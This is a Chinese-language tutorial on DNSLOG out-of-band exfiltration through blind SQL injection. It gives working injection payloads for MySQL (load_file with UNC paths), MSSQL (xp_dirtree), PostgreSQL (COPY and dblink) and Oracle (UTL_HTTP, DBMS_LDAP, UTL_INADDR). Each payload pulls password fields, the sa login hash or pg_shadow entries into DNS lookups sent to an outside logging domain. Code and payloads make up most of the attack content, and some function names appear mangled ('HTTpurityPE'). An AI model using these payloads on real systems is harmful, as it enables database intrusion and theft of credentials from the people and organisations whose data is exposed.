目录
1.DNSLOG的原理
DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,
DNS的解析过程示意图
其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
Dnslog攻击的基本原理
如图所示,作为攻击者,提交注入语句,让数据库把需要查询的值和域名拼接起来,然后发生DNS查询,我们只要能获得DNS的日志,就得到了想要的值。所以我们需要有一个自己的域名,然后在域名商处配置一条NS记录,然后我们在NS服务器上面获取DNS日志即可。
2.Dnslog在常见数据库中sql注入的实战
这里主要列举了4种数据库,MysqL、MSsql、Postgresql、Oracle。
本次演示一个最常见的注入场景,就是WHERE后面条件处的注入。实验环境有一个test_user表,三个字段id、user、pass。如下
最后想要达到的目的是通过DNS外带的方式查询到pass字段的内容。
此处就不再自己搭建一个DNS服务器了,直接用ceye.io这个平台吧,这个平台就集成了Dnslog的功能。
1、MysqL
1) load_file
MysqL应该是在实战中利用Dnslog最多的,所以先来说说它吧。
在MysqL中有个一个load_file函数可以用来读取本地的文件。
http://127.0.0.1/MysqL.PHP?id=1 union select 1,2,load_file(CONCAT('\\',(SELECT hex(pass)
FROM test.test_user WHERE name='admin' LIMIT 1),'.MysqL.nk40ci.ceye.io\abc'))
可以看到test_user中的pass字段的值的Hex码就被查询出来了,为什么这个地方Hex编码的目的就是减少干扰,因为很多事数据库字段的值可能是有特殊符号的,这些特殊符号拼接在域名里是无法做dns查询的,因为域名是有一定的规范,有些特殊符号是不能带入的。
注意:load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。
2) UNC路径
以下是百度的UNC路径的解释
UNC是一种命名惯例,主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。
其实我们平常在WidNows中用共享文件的时候就会用到这种网络地址的形式
\\sss.xxx\test\
这也就解释了为什么CONCAT()函数拼接了4个\了,因为转义的原因,4个就变\成了2个\,目的就是利用UNC路径。
tips:
因为Linux没有UNC路径这个东西,所以当MysqL处于Linux系统中的时候,是不能使用这种方式外带数据的
2、mssql
1)、先看看网上流传最多的POC:
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree"\'+@host+'\foobar$"');这个POC在数据库控制台执行的确是可以得到数据库中sa用户Hex编码之后的Hash的。但是实际要获得我们的test_user的表中的数据的时候,对POC需要一定的加工。
这里的user字段正好和系统的user()函数同名,所以字段需要[]包裹。
- 开始和域名拼接,发生如下图的情况
然后发现拼接起来的字符串有空格,这是因为在sqlserver中当需要字符串拼接的时候,如果字段的值的长度没有达到表结构字段的长度,就会用空格来填充
这里我的pass字段设置的长度是50,所但是值实际的长度是8,之所以剩余的长度就用空格填充了。这个时候就用想办法去掉空格,查阅手册可以发现rtrim函数是可以去除右边空格的,如下图
- 开始编码,前面说过域名是不能带有些特殊字符的,所以我们最好能将查询出来的值编码之后再和域名进行拼接,但是在查阅了sqlserver的手册之后,没有发现可以直接对字符类型进行编码的函数,只有将2进制转换成Hex的函数,所以这里我需要先将字符类型强制转换成varbinary二进制类型,然后再将二进制转化成Hex编码之后的字符类型。先转换成二进制
再把二进制转换成字符类型的Hex编码
最后完整的POC就是出来了。
http://127.0.0.1/mssql.PHP?id=1;
DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass)))
FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';
EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');结果如下:
那为什么网上给的那个POC就是能够获取到sa用户的hash之后的hex码的呢,原因如下:
因为那个hash字段本来就是二进制类型,所以不需要在经过类型转换了。
tips:此处有个小问题,因为拼接用到了+号,+号在url中如果不url编码到代码层的时候就成空格了,所以我们需要在提交之前对+号url编码下
- master..xp_fileexist
- master..xp_subdirs
- OpenRowset()
- OpenDatasource()
这个两个函数都需要高权限,而且系统是默认关闭的,需要通过sp_configure去配置高级选项开启功能,开启代码如下:
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'Ad Hoc distributed Queries',1;
reconfigure;所以此处不推荐使用这两个函数,不仅权限要求高而且使用起来也太麻烦,前面三已经够用了。
3、postgresql
大多数的脚本语言对于Postgresql都是支持sql语句多语句的执行的所以此处就非常方便了,我们可以编写一个自定义的函数和存储过程就好了,和sqlServer类似。1)copy函数的定义
copY tablename [ ( column [,...] ) ]
FROM { 'filename' | STDIN } [ WITH ] [ BINARY ] [ OIDS ] [ DELIMITER [ AS ] 'delimiter' 'null string' ] CSV [ QUOTE [ AS ] 'quote' 'escape' ]
[ FORCE NOT NULL column [,...] ]
copY tablename [ ( column [,...] ) ] TO { 'filename' | STDOUT } [ WITH ] [ BINARY ] [ OIDS ] [ DELIMITER [ AS ] 'delimiter' 'null string' ]
CSV [ QUOTE [ AS ] 'quote' 'escape' ] [ FORCE QUOTEcolumn [,...] ]从定义看出这里是无法嵌套查询,它这里需要直接填入文件名,所以过程就麻烦一点。
这是网上的POC,整体上没有什么问题。
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()RETURNS VOID AS $$DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;BEGINSELECT INTO query_result (SELECT passwdFROM pg_shadow WHERE usename='postgres');
exec_cmd := E'copY table_output(content)FROM E\'\\\\'||query_result||E'.postgresql.nk40ci.ceye.io\\foobar.txt\'';
EXECUTE exec_cmd;END;$$ LANGUAGE plpgsql Security DEFINER;SELECT temp_function();只是需要对数据处理编一下码,此处会用到encode函数,如下
encode(pass::bytea,’hex’)
最后完整的POC如下:
http://127.0.0.1/pgsql.PHP?id=1;DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$ DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN SELECT INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);
exec_cmd := E'copY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.psql.3.nk40ci.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql Security DEFINER;
SELECT temp_function();结果:
tips:因为这里的copy需要的参数是文件路径,所以这里其实也是利用了UNC路径,因此这个方式也只能在windows下使用
2)db_link扩展
db_link是Postresql用来连接其他的数据库的扩展,用法也很简单,而且可以嵌套子查询,那就很方便了
dblink('连接串','sql语句')http://127.0.0.1/pgsql.PHP?id=1;CREATE EXTENSION dblink;
SELECT * FROM dblink('host='||(select encode(pass::bytea,'hex') from test_user where id =1)||'.vvv.psql.3.nk40ci.ceye.io user=someuser dbname=somedb','SELECT version()') RETURNS (result TEXT);CREATE EXTENSION dblink; 就是打开这个扩展,因为这个扩展默认是关闭的。
tips:
4、Oracle
Oracle的利用方式就太多了,因为Oracle能够发起网络请求的模块是很很多的。
这里就列举几个吧。
- UTL_HTTP.REQUEST
select name from test_user where id =1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL;
- DBMS_LDAP.INIT
select name from test_user where id =1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL;- HTTpurityPE
select name from test_user where id =1 union SELECT HTTpurityPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL;- UTL_INADDR.GET_HOST_ADDRESS
select name from test_user where id =1 union SELECT UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL; tips:oracle是不允许select语句后面没有表的,所以此处可以跟一个伪表dual
Oracle其他一些能够发起网络请求的模块:
UTL_HTTP
UTL_TCP
UTL_SMPTP
UTL_URL3.总结
- 有些函数的使用操作系统的限制。
- dns查询有长度限制,所以必要的时候需要对查询结果做字符串的切割。
- 避免一些特殊符号的产生,最好的选择就是数据先编码再带出。
- 注意不同数据库的语法是有差异的,特别是在数据库拼接的时候。
- 有些操作是需要较高的权限。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
